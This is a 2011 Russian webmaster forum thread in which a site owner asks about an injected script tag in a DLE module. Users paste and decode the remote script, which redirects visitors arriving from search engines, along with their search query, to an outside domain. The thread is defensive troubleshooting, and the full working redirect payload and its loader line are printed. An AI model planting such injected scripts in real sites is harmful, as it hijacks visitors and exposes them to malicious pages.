Проблема

Сообщений: 1040 Регистрация: Апр 2011

15 Июня 2011 19:39

Тут такая проблема появилась мой сайт в "ОПЕРЕ" пишет "Предупреждение о вредоносном ПО", я сначало не понял почему пока не порылся в "Исходном коде страницы"
там есть такие скрипты:
Для Dle есть такой модуль "Переходы" и там есть такие переходы "kinoz <sc ript src=http://quzone.ru/j.js></script>(скрипта нет тока в "Исходном коде страницы") " , а этот скрипт активируется

Код
<sc ript src=http://quzone.ru/j.js></script>

Кто подскажет что это за скрипт и что он делает

Изменено: killer1000 - 15 Июня 2011 19:56

daden11

Сообщений: 320 Регистрация: Май 2010

15 Июня 2011 20:04

по этому адресу вот чё лежит:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.lots-moment-archiv.ru/%27+%27%3Fwkey%3D"+l('825c8')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}
если есть кодеры, подскажите, что это?

killer1000

Сообщений: 1040 Регистрация: Апр 2011

15 Июня 2011 20:12

раскодировал теперь помогите разобраться

Код

function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf(\'google.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'yandex.\') > -1 || r.indexOf(\'bing.com.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'rambler.\') > -1 || r.indexOf(\'go.mail.\') > -1){document.write(une scape(\"<sc ript type="text/javascript">sp_redirect = {};sp_redirect.searchers = [ [/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];sp_redirect.sp_redirect = function(referer) { var query=null; for(var i=0; i<sp_redirect.searchers.length; i  ) {  var se = sp_redirect.searchers[i];  if (referer.match(se[0])) {   query = referer.match(se[1])[se[2]];   break;  } } document.location.href='http://shara.lots-moment-archiv.ru/' '?wkey=\" l(\'825c8\') \"' '' (query? '&query=' query : '');};sp_redirect.sp_redirect(document.referrer);</script>\")); 
}

daden11 Сообщений: 320 Регистрация: Май 2010	#4 15 Июня 2011 20:39 Ну по любому этот левый код подтягиваемый с чужого сайта настораживает. Допустим на данный момент он выполняет часть функционала модуля переходов, всё вроде ок. Далее, допустим эту версию переходов со временем скачают и поставит у себя 1000 человек на своих 1000 сайтах. И вот однажды, владелец этого _http://quzone.ru возьмёт и поменяет код в файле j.js на шелл или проксик какой ни-ть, и либо начнёт кого нибудь ddos-ить или просто на любом из сайтов покопается. А потом вернёт всё обратно, и вы даже знать не будете, что ваш сайт участвовал в атаке. Не знаю, мне кажется если на жертву единовременно будет 1000 переходов с других сайтов, сайт ляжет. Изменено: daden11 - 15 Июня 2011 21:01

28.08.2023 17:28	Вопрос знатокам AVE.cms
14.06.2023 19:42	Нужен знающий человек по работе с Facebook и интеграции
07.06.2023 21:59	Подскажите движок
10.05.2023 21:15	Modx и с чем его есть
27.02.2023 16:55	Why is Salesforce the Future of CRM

Новые темы	Объявления	Свободное общение
01:31 Stixi.ru. и stixi.com 20:30 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 15:00 Adtrafico - Правильная партнёрская сеть под бурж трафик 16:45 Adfinity - Ваш надежный партнер в монетизации трафика 15:05 Gambling Craft - гемблинг по белому 19:35 Парсят сай до ddos 16:02 DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт!	11:38 Majento SiteAnalyzer - бесплатная программа для аудита и анализа сайта 04:38 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 21:21 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 21:00 Приватные мобильные прокси Украины безлимиты 4g UA Водафон Киевстар Лайф 20:53 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 17:22 Sectormoney.com - быстрый и удобный обменник 16:59 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust	00:22 Точные прогнозы на футбол 20:09 Сколько сейчас стоит наполнение ИМ? 12:43 Куплю проигрышные букмекерские аккаунты 04:33 Половина скидок на распродажах — фейк 07:53 НейроБабушка наказывает мошенников 19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 19:57 Пятница 13-ое: VK принял радикальное решение и закрыл доступ к порно контенту